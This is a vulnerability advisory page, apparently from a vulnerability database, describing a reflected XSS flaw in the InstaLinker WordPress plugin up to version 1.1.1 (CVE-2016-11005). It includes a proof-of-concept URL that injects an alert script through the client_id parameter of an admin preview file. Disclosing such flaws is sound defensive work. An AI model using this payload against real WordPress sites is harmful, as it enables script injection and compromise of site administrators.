Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
wpexploitRob CarrWPEX-ID:645E72B6-2FE5-4E20-88A1-69F5BEC7A45C
HistoryFeb 07, 2016 - 12:00 a.m.

InstaLinker <= 1.1.1 - Reflected Cross-Site Scripting (XSS)

2016-02-0700:00:00
Rob Carr
10

EPSS

0.001

Percentile

32.7%

JSON

Due to a lack of input sanitization in the includes/instalinker-admin-preview.php file, it is possible to utilise a reflected XSS vector to run a script in the target user’s browser and potentially compromise the WordPress installation.

http://www.example.com/wp-content/plugins/instalinker/includes/instalinker-admin-preview.php?client_id=%22%3E%3Cscript%3Ealert(1);%3C/script%3E%3Cdiv%20data-il-client-id=%22

Related

wpvulndb 1
prion 1
cve 1
nvd 1
cvelist 1
wpvulndb
wpvulndb
InstaLinker <= 1.1.1 - Reflected Cross-Site Scripting (XSS)
2016-02-07 00:00:00
prion
prion
Cross site scripting
2019-09-20 15:15:00
cve
cve
CVE-2016-11005
2019-09-20 15:15:13
nvd
nvd
CVE-2016-11005
2019-09-20 15:15:13
cvelist
cvelist
CVE-2016-11005
2019-09-20 14:41:18

EPSS

0.001

Percentile

32.7%

JSON
Related for WPEX-ID:645E72B6-2FE5-4E20-88A1-69F5BEC7A45C
wpvulndb1prion1cve1nvd1cvelist1